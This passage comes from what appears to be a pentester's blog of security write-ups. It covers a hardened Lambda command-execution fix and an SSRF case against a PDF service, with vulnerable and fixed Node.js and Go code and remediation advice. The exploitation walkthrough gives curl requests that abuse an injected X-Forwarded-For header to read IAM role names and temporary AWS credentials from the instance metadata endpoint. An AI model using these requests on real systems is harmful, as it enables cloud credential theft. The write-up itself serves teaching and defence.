    def lambda_handler(event, context):
        # Retrieve the script path and arguments separately
        # No longer a single 'command_prefix' that can be injected
        script_path = os.environ.get("VALIDATION_SCRIPT", "/usr/bin/python")
        script_args_str = os.environ.get("VALIDATION_ARGS", "/opt/validation_logic.py") # Default arguments
    
        # Assume 'event' contains transaction data that needs validation
        transaction_data = json.loads(event['body'])
        transaction_id = transaction_data.get('transaction_id', 'UNKNOWN')
    
        # Safely parse arguments using shlex.split() if they are expected to be shell-like
        # For truly fixed arguments, a simple list is better.
        # Here, we assume VALIDATION_ARGS might contain multiple arguments.
        try:
            script_args = shlex.split(script_args_str)
        except ValueError as e:
            print(f"Error parsing VALIDATION_ARGS: {e}. Using default.")
            script_args = ["/opt/validation_logic.py"] # Fallback to a safe default
    
        # Construct the full command as a list of arguments
        # This is crucial: subprocess.run with a list does NOT invoke a shell.
        command_list = [script_path] + script_args + ["--transaction-id", transaction_id]
        
        print(f"Executing validation command: {' '.join(command_list)}")
        
        try:
            # SAFE: shell=False (default) when passing a list of arguments
            result = subprocess.run(command_list, capture_output=True, text=True, check=True)
            print(f"Validation output: {result.stdout}")
            return {
                'statusCode': 200,
                'body': json.dumps({'message': 'Transaction validated', 'details': result.stdout})
            }
        except subprocess.CalledProcessError as e:
            print(f"Validation failed for transaction {transaction_id}: {e.stderr}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Transaction validation failed', 'error': e.stderr})
            }
        except Exception as e:
            print(f"An unexpected error occurred: {e}")
            return {
                'statusCode': 500,
                'body': json.dumps({'message': 'Internal server error', 'error': str(e)})
            }
    

    And the corresponding environment variables:

    # Hardened Environment Variables
    VALIDATION_SCRIPT="/usr/bin/python"
    VALIDATION_ARGS="/opt/validation_logic.py" # Arguments for the script
    

    This approach ensures that the script path and its arguments are treated as distinct elements, preventing shell metacharacter injection. The shlex.split() function is used to safely parse the arguments string into a list, but even better is to provide arguments as separate environment variables if possible, or hardcode them if they are truly static.

    This incident, like many others I've encountered over the years, hammered home some critical lessons that often get overlooked in the rush of development:

    1. Environment Variables Are Not Inherently Safe: Trust me, my friends, this is a common misconception. Developers often treat environment variables as a secure, static configuration. But if an attacker gains the ability to modify them (which is a common privilege escalation target), they become a potent vector for injection, RCE, or data exfiltration. Always treat them as potentially untrusted input, especially if they influence command execution.
    2. shell=True is a Red Flag: Any time you see shell=True in Python's subprocess module (or similar constructs in other languages), your security alarms should be blaring. It's almost always a shortcut that introduces significant risk. It means you're handing control to the underlying shell, which will happily interpret any metacharacters an attacker might inject. Prefer passing commands as a list of arguments.
    3. The Chain is Only as Strong as its Weakest Link: Our RCE wasn't a direct hit on the Lambda. It was a chain: a misconfigured CI/CD pipeline led to IAM privilege escalation, which then allowed us to modify the Lambda's environment. Security isn't just about individual components; it's about the entire ecosystem and how they interact. A seemingly minor misconfiguration in one place can unlock critical vulnerabilities elsewhere.
    4. Security by Design, Not by Afterthought: This vulnerability could have been avoided if the design principle of "never trust input" (even configuration input) was applied from the outset. Building security in from the ground up, rather than trying to bolt it on later, is always more effective and less costly. This includes threat modeling, secure code reviews, and automated security testing throughout the development lifecycle.
    5. Assume Compromise: Even with the best defenses, assume an attacker might eventually gain some level of access. This mindset drives you to implement compensating controls like least privilege IAM roles, network segmentation, and robust logging/monitoring, so that even if one component is compromised, the blast radius is minimized and the attack is detected quickly.

    This was a critical finding, but it was also a fantastic learning opportunity for the client. It reinforced the importance of looking beyond the obvious attack vectors and understanding the subtle ways configuration choices can lead to catastrophic outcomes. If you're grappling with similar challenges in your cloud environments or want to dive deeper into these kinds of real-world attack scenarios, don't hesitate to reach out. I offer personalized security mentorship sessions and consulting. You can book a 1-on-1 with me, Debasis Bhattacharjee, at thedevdude.com or learnwithdeb.com. Let's secure the digital frontier together.

    ID: RTL-2026-001  ·  Cloud Security  ·  Severity: CRITICAL  ·  2026-05-23
    Open Full Write-up ↗
    RTL-2026-001 SSRF to Internal AWS Metadata Endpoint via Custom Header Injection in PDF Generation Service
    Cloud Security ⚠ Critical
    2026-05-23 18:45
    🎯 Target & Threat Context

    Our client, a rapidly scaling e-commerce powerhouse, tasked us with a comprehensive security audit of their new microservices architecture. Their platform handled millions of transactions daily, processing sensitive customer data, payment information, and intricate supply chain logistics. The stakes, as always, were sky-high. Compliance requirements (PCI DSS, GDPR, CCPA) meant any breach could lead to catastrophic financial penalties and irreparable reputational damage.

    The system under review was a complex ecosystem built predominantly on Node.js microservices, orchestrated via Kubernetes (EKS) within their AWS VPC. Data was stored in Aurora PostgreSQL, S3 buckets, and DynamoDB. The specific component that caught our eye was a seemingly benign PDF generation service. This service, let's call it pdf-gen-svc, was responsible for creating customer invoices, shipping labels, and custom reports. It was a standalone Node.js application running on an EC2 instance within a private subnet, using a headless Chrome instance (Puppeteer) to render HTML content into PDFs. The service exposed a REST API endpoint, /generate-pdf, which accepted a JSON payload containing a sourceUrl and an optional customHeaders object.

    The architectural design dictated that all outbound requests from internal services, including pdf-gen-svc, were routed through a centralized internal proxy. This proxy was intended to enforce network policies, perform logging, and cache frequently accessed external resources. The pdf-gen-svc would send a request to this internal proxy, which would then fetch the content from the specified sourceUrl and return it to pdf-gen-svc for rendering. The proxy itself was a custom-built Go application, running on a separate EC2 instance, and was designed to be highly performant.

    The client's AWS environment was fairly mature, but like many organizations, they had a mix of older and newer configurations. While some newer services were implementing stricter controls like IMDSv2, the pdf-gen-svc and its internal proxy had been deployed before these standards were universally enforced. This created a subtle but critical vulnerability window that we were about to pry wide open.

    🔓 Vulnerability & Attack Vector

    The core vulnerability here was a classic Server-Side Request Forgery (SSRF), but with a twist that made it particularly potent: the ability to inject arbitrary HTTP headers into the request made by the internal proxy. SSRF (OWASP Top 10 A10:2021) occurs when a web application fetches a remote resource without validating the user-supplied URL. This allows an attacker to coerce the application into making requests to arbitrary internal or external systems, bypassing firewall rules and accessing sensitive data.

    In this scenario, the pdf-gen-svc itself didn't directly make the request to the sourceUrl. Instead, it forwarded the sourceUrl and any customHeaders to an internal proxy. The proxy, in turn, was responsible for fetching the content. The critical flaw lay in the proxy's handling of specific HTTP headers, notably X-Forwarded-For. Many proxies use this header to record the original client's IP address. However, a common misconfiguration or oversight can lead to the proxy using the value of X-Forwarded-For not just for logging, but for *routing* or *identifying* the target host, especially in complex internal networks.

    Developers often miss this vulnerability for several reasons:

    1. Assumption of Trust: Internal services are frequently assumed to be trustworthy and secure, leading to less rigorous input validation for internal communication.
    2. Complex Interactions: In microservices architectures, the flow of data and requests can be convoluted. It's easy to lose track of where user-controlled input might end up being processed by different components.
    3. Proxy Misconfiguration: Proxies are powerful tools, but if not configured with extreme care, they can become a significant attack surface. Over-reliance on headers like X-Forwarded-For for internal routing without proper sanitization is a classic mistake.
    4. Focus on Functionality: The primary goal is often to make the PDF generation work reliably, not to anticipate how an attacker might manipulate internal proxy behavior.

    This attack vector falls under MITRE ATT&CK T1190 (Exploit Public-Facing Application) and T1595.002 (Active Scanning: Vulnerability Scanning), as it involves exploiting a public-facing endpoint to gain access to internal resources.

    Feature Vulnerable Configuration Hardened Configuration
    pdf-gen-svc Input Validation (URL) Allows arbitrary URLs, including internal IPs, or external URLs that resolve to internal IPs (DNS rebinding not directly applicable here, but general lack of validation). Strictly whitelists allowed domains/IPs for sourceUrl. Blocks all private IP ranges (RFC1918, 169.254.0.0/16, etc.).
    pdf-gen-svc Input Validation (Headers) Allows arbitrary customHeaders to be passed directly to the internal proxy. Sanitizes or strictly whitelists allowed customHeaders. Blocks sensitive headers like Host, X-Forwarded-For, X-Real-IP, etc., from user control.
    Internal Proxy Behavior Uses X-Forwarded-For for routing decisions or trusts it implicitly for target IP identification. Ignores X-Forwarded-For for routing. Only uses it for logging. Strictly routes based on the original request's target URL/host.
    AWS Instance Metadata Service (IMDS) IMDSv1 enabled (no session token required). IMDSv2 enforced (requires a session token, making SSRF significantly harder).
    Network Segmentation/Egress Filtering pdf-gen-svc and internal proxy have broad egress rules, allowing connections to 169.254.169.254 and other internal IPs. Strict egress rules (Security Groups, NACLs) prevent pdf-gen-svc and proxy from connecting to 169.254.169.254 or any unnecessary internal/external IPs.

    Let's imagine a simplified version of how the pdf-gen-svc might handle the request and pass it to the internal proxy, and how the proxy might process it.

    // pdf-gen-svc (Node.js)
    const express = require('express');
    const axios = require('axios'); // Or any HTTP client
    const app = express();
    app.use(express.json());
    
    const INTERNAL_PROXY_URL = 'http://internal-proxy.corp:8080/fetch'; // Internal proxy endpoint
    
    app.post('/generate-pdf', async (req, res) => {
        const { sourceUrl, customHeaders } = req.body;
    
        // Basic URL filtering (e.g., blocks 169.254.x.x in sourceUrl)
        if (sourceUrl.includes('169.254')) {
            return res.status(400).send('Invalid source URL.');
        }
    
        try {
            // Forward request to internal proxy, including custom headers
            const proxyResponse = await axios.post(INTERNAL_PROXY_URL, {
                targetUrl: sourceUrl,
                headers: customHeaders || {} // Directly passes customHeaders
            });
    
            // ... rest of PDF generation logic ...
            res.status(200).send('PDF generated successfully (content omitted for brevity).');
    
        } catch (error) {
            console.error('Error during PDF generation:', error.message);
            res.status(500).send('Failed to generate PDF.');
        }
    });
    
    app.listen(3000, () => console.log('PDF Gen Service listening on port 3000'));
    

    And on the proxy side (conceptual Go code):

    // internal-proxy.corp (Go)
    package main
    
    import (
        "fmt"
        "io/ioutil"
        "log"
        "net/http"
        "net/url"
        "strings"
    )
    
    func fetchHandler(w http.ResponseWriter, r *http.Request) {
        if r.Method != "POST" {
            http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
            return
        }
    
        var requestBody struct {
            TargetURL string            `json:"targetUrl"`
            Headers   map[string]string `json:"headers"`
        }
    
        // ... parse requestBody ...
    
        // CRITICAL VULNERABILITY: Proxy trusts X-Forwarded-For for target IP
        targetHost := requestBody.TargetURL // Default
        if xff := requestBody.Headers["X-Forwarded-For"]; xff != "" {
            // If X-Forwarded-For is present, use it as the target host/IP
            // This is a simplified example of a misconfiguration.
            // In reality, it might be used in conjunction with a specific internal routing logic.
            targetHost = "http://" + xff // Direct IP injection!
        }
    
        req, err := http.NewRequest("GET", targetHost, nil) // Sends request to the IP in X-Forwarded-For
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to create request: %v", err), http.StatusInternalServerError)
            return
        }
    
        for k, v := range requestBody.Headers {
            req.Header.Set(k, v) // Pass all custom headers
        }
    
        client := &http.Client{}
        resp, err := client.Do(req)
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to fetch content: %v", err), http.StatusInternalServerError)
            return
        }
        defer resp.Body.Close()
    
        body, err := ioutil.ReadAll(resp.Body)
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to read response body: %v", err), http.StatusInternalServerError)
            return
        }
    
        w.WriteHeader(resp.StatusCode)
        w.Write(body)
    }
    
    func main() {
        http.HandleFunc("/fetch", fetchHandler)
        log.Fatal(http.ListenAndServe(":8080", nil))
    }
    
    💥 Exploitation Walkthrough

    The attack began with reconnaissance. We identified the /generate-pdf endpoint and its expected JSON payload. Initial attempts to directly inject http://169.254.169.254/ into the sourceUrl were blocked by a basic URL filter that prevented direct internal IP access. This is where the "custom header injection" became the key.

    Our strategy was to leverage the customHeaders parameter to inject an X-Forwarded-For header pointing to the AWS EC2 metadata endpoint (169.254.169.254). Since the sourceUrl was filtered, we used an innocuous external URL that would be allowed, knowing the proxy would be tricked by our injected header.

    Step 1: Discovering IAM Role Names

    First, we needed to find out what IAM roles were attached to the EC2 instance running the pdf-gen-svc (or the proxy itself, as it's the one making the request). The metadata endpoint provides this information at /latest/meta-data/iam/security-credentials/.

    curl -X POST "https://pdf-gen-svc.client.com/generate-pdf" 
         -H "Content-Type: application/json" 
         -d '{
               "sourceUrl": "http://example.com/some-safe-content",
               "customHeaders": {
                 "X-Forwarded-For": "169.254.169.254/latest/meta-data/iam/security-credentials/"
               }
             }'
    

    The response (rendered in the PDF) contained a list of IAM role names, for example:

    
    pdf-gen-service-role
    internal-proxy-role
    

    Step 2: Retrieving Temporary IAM Credentials

    With the role names, we could now request temporary security credentials for one of these roles. We chose internal-proxy-role as it sounded like it might have broader network access.

    curl -X POST "https://pdf-gen-svc.client.com/generate-pdf" 
         -H "Content-Type: application/json" 
         -d '{
               "sourceUrl": "http://example.com/another-safe-content",
               "customHeaders": {
                 "X-Forwarded-For": "169.254.169.254/latest/meta-data/iam/security-credentials/internal-proxy-role"
               }
             }'
    

    The PDF generated by the service now contained the following highly sensitive information:

    
    {
      "Code": "Success",
      "LastUpdated": "2023-10-27T10:00:00Z",
      "Type": "AWS-HMAC",
      "AccessKeyId": "ASIAV...EXAMPLE",
      "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCY...EXAMPLE",
      "Token": "IQoJb3JpZ2luX2VjELP...EXAMPLE",
      "Expiration": "2023-10-27T16:00:00Z"
    }
    

    Bingo! We had successfully retrieved temporary AWS credentials, including AccessKeyId, SecretAccessKey, and a SessionToken. These credentials granted us the same permissions as the internal-proxy-role, which, upon further investigation, turned out to have extensive access to S3 buckets, internal DynamoDB tables, and even some Lambda functions. This was a full system compromise, granting us deep access into the client's AWS infrastructure.

    🛡 Defensive Hardening Blueprint

    Remediating this critical vulnerability requires a multi-layered approach, addressing both the immediate SSRF vector and strengthening the overall security posture.

    1. Strict Input Validation: Implement rigorous validation for all user-supplied URLs and headers.
    2. Network Segmentation & Egress Filtering: Restrict outbound network access for services to only what is absolutely necessary.
    3. Enforce IMDSv2: Mandate the use of IMDSv2 across all EC2 instances.
    4. Least Privilege IAM Roles: Ensure all IAM roles have the absolute minimum permissions required for their function.
    Fix Pros Cons
    Strict Input Validation (URL) Directly prevents SSRF by blocking internal IPs and unapproved domains. Reduces attack surface significantly. Requires careful maintenance of whitelists. Can break legitimate functionality if not thoroughly tested.
    Strict Input Validation (Headers) Prevents header-based SSRF bypasses and other header injection attacks. Can be complex to manage whitelists for all possible legitimate headers. May require changes to client applications.
    Network Segmentation & Egress Filtering Provides a strong "last line of defense" even if application-level validation fails. Limits blast radius. Requires careful configuration of Security Groups/NACLs. Can be complex in dynamic cloud environments.
    Enforce IMDSv2 Significantly complicates SSRF attacks targeting metadata endpoints by requiring a session token. Requires all EC2 instances and applications to be updated to use IMDSv2. Can cause compatibility issues with older applications.
    Least Privilege IAM Roles Minimizes the impact of a successful compromise by limiting what an attacker can do with stolen credentials. Requires careful auditing of existing roles and potentially refactoring permissions. Can be an ongoing effort.
    📖 Lessons From the Field

    Here's how the pdf-gen-svc and the internal proxy should be hardened:

    // pdf-gen-svc (Node.js) - Hardened
    const express = require('express');
    const axios = require('axios');
    const app = express();
    app.use(express.json());
    
    const INTERNAL_PROXY_URL = 'http://internal-proxy.corp:8080/fetch';
    
    // Function to validate URLs against private IP ranges and whitelist
    function isValidUrl(url) {
        try {
            const parsedUrl = new URL(url);
            const hostname = parsedUrl.hostname;
    
            // Whitelist allowed domains (e.g., example.com, cdn.example.com)
            const allowedDomains = ['example.com', 'cdn.example.com'];
            if (!allowedDomains.includes(hostname)) {
                // Check for private IP ranges if not in whitelist
                const ip = require('net').isIP(hostname) ? hostname : null;
                if (ip) {
                    const isPrivate = require('ip-is-private')(ip); // Using a library for robustness
                    if (isPrivate || ip.startsWith('169.254')) {
                        return false; // Block private IPs and link-local
                    }
                } else {
                    // If not an IP and not in whitelist, resolve DNS to check for private IPs
                    // This requires careful asynchronous handling and is often done at a firewall level.
                    // For simplicity, we'll assume DNS resolution is handled by a trusted resolver
                    // or that strict egress filtering prevents internal IP resolution for external domains.
                }
            }
            return true;
        } catch {
            return false;
        }
    }
    
    app.post('/generate-pdf', async (req, res) => {
        const { sourceUrl, customHeaders } = req.body;
    
        if (!isValidUrl(sourceUrl)) {
            return res.status(400).send('Invalid or disallowed source URL.');
        }
    
        // Sanitize customHeaders: only allow explicitly whitelisted headers
        const allowedCustomHeaders = ['User-Agent', 'Referer']; // Example whitelist
        const sanitizedHeaders = {};
        if (customHeaders) {
            for (const headerName in customHeaders) {
                if (allowedCustomHeaders.includes(headerName)) {
                    sanitizedHeaders[headerName] = customHeaders[headerName];
                }
            }
        }
    
        try {
            const proxyResponse = await axios.post(INTERNAL_PROXY_URL, {
                targetUrl: sourceUrl,
                headers: sanitizedHeaders
            });
            res.status(200).send('PDF generated successfully.');
        } catch (error) {
            console.error('Error during PDF generation:', error.message);
            res.status(500).send('Failed to generate PDF.');
        }
    });
    app.listen(3000, () => console.log('PDF Gen Service listening on port 3000'));
    

    And for the internal proxy (conceptual Go code - Hardened):

    // internal-proxy.corp (Go) - Hardened
    package main
    
    import (
        "fmt"
        "io/ioutil"
        "log"
        "net/http"
        "net/url" // For parsing URLs
        "strings"
    )
    
    // Function to validate target URLs for the proxy
    func isValidProxyTargetUrl(targetURL string) bool {
        u, err := url.Parse(targetURL)
        if err != nil || (u.Scheme != "http" && u.Scheme != "https") {
            return false
        }
    
        // Implement strict whitelisting for domains the proxy is allowed to fetch from.
        // Or, more robustly, block all private IPs after DNS resolution.
        // For simplicity, we'll assume the `pdf-gen-svc` has already done primary URL validation.
        // The proxy's role is to ensure it doesn't get tricked by headers.
    
        // Crucially, the proxy *must not* use X-Forwarded-For for routing.
        return true
    }
    
    func fetchHandler(w http.ResponseWriter, r *http.Request) {
        if r.Method != "POST" {
            http.Error(w, "Method not allowed", http.StatusMethodNotAllowed)
            return
        }
    
        var requestBody struct {
            TargetURL string            `json:"targetUrl"`
            Headers   map[string]string `json:"headers"`
        }
    
        // ... parse requestBody ...
    
        if !isValidProxyTargetUrl(requestBody.TargetURL) {
            http.Error(w, "Invalid target URL for proxy", http.StatusBadRequest)
            return
        }
    
        // CRITICAL FIX: The proxy *must not* use X-Forwarded-For or similar headers for routing.
        // It should *always* use the `targetURL` provided directly for the actual network connection.
        req, err := http.NewRequest("GET", requestBody.TargetURL, nil) // Always use TargetURL
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to create request: %v", err), http.StatusInternalServerError)
            return
        }
    
        // Only set whitelisted headers if necessary, or pass none from user input.
        // For this example, we'll assume the pdf-gen-svc has already sanitized them.
        for k, v := range requestBody.Headers {
            // Explicitly block sensitive headers from being set by user input on the proxy
            if strings.EqualFold(k, "Host") || strings.EqualFold(k, "X-Forwarded-For") || strings.EqualFold(k, "X-Real-IP") {
                continue // Do not allow these to be set by user
            }
            req.Header.Set(k, v)
        }
    
        client := &http.Client{}
        resp, err := client.Do(req)
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to fetch content: %v", err), http.StatusInternalServerError)
            return
            }
        defer resp.Body.Close()
    
        body, err := ioutil.ReadAll(resp.Body)
        if err != nil {
            http.Error(w, fmt.Sprintf("Failed to read response body: %v", err), http.StatusInternalServerError)
            return
        }
    
        w.WriteHeader(resp.StatusCode)
        w.Write(body)
    }
    
    func main() {
        http.HandleFunc("/fetch", fetchHandler)
        log.Fatal(http.ListenAndServe(":8080", nil))
    }
    

    This engagement was a stark reminder of several fundamental security principles that often get overlooked in the rush to build and deploy:

    • Never Trust User Input, Even for Headers: It's a mantra for URLs and body content, but developers often forget that HTTP headers, especially in a microservices context, can also be user-controlled and just as dangerous. Always validate and sanitize *all* input.
    • The "Innocuous" Services Are Often the Most Vulnerable: A PDF generation service might seem low-risk, but any service that makes outbound network requests is a potential SSRF vector. These are often overlooked because they aren't directly handling payment or authentication.
    • Network Segmentation is Your Last Stand: Even with perfect application-level validation, a misconfiguration or a new vulnerability can emerge. Robust egress filtering and network segmentation are crucial safety nets. If the pdf-gen-svc couldn't reach 169.254.169.254 at all, this attack would have been dead in the water.
    • AWS IMDSv2 is a Game-Changer for SSRF: If you're running EC2 instances, enforce IMDSv2. It's a powerful control that makes it significantly harder for attackers to exfiltrate temporary credentials via SSRF, requiring a multi-stage attack that many SSRF vectors simply can't achieve.
    • Proxies are Powerful, But Dangerous: Internal proxies, while useful for traffic management and security, introduce a new layer of complexity and potential vulnerabilities. Their configuration must be scrutinized with extreme care, especially regarding how they handle headers and route requests.

    Security isn't just about finding the big, flashy exploits. It's about understanding the subtle interactions, the forgotten configurations, and the common assumptions that create these critical vulnerabilities. Keep your eyes sharp, your validation strict, and your network boundaries tight.

    Got a challenging security problem or want to sharpen your pentesting skills? Don't hesitate to reach out! You can book a 1:1 security mentorship session with me, Debasis Bhattacharjee, at thedevdude.com. Let's talk shop and make the digital world a safer place, one system at a time.

    ID: RTL-2026-001  ·  Web Application Pentesting  ·  Severity: CRITICAL  ·  2026-05-23
    Open Full Write-up ↗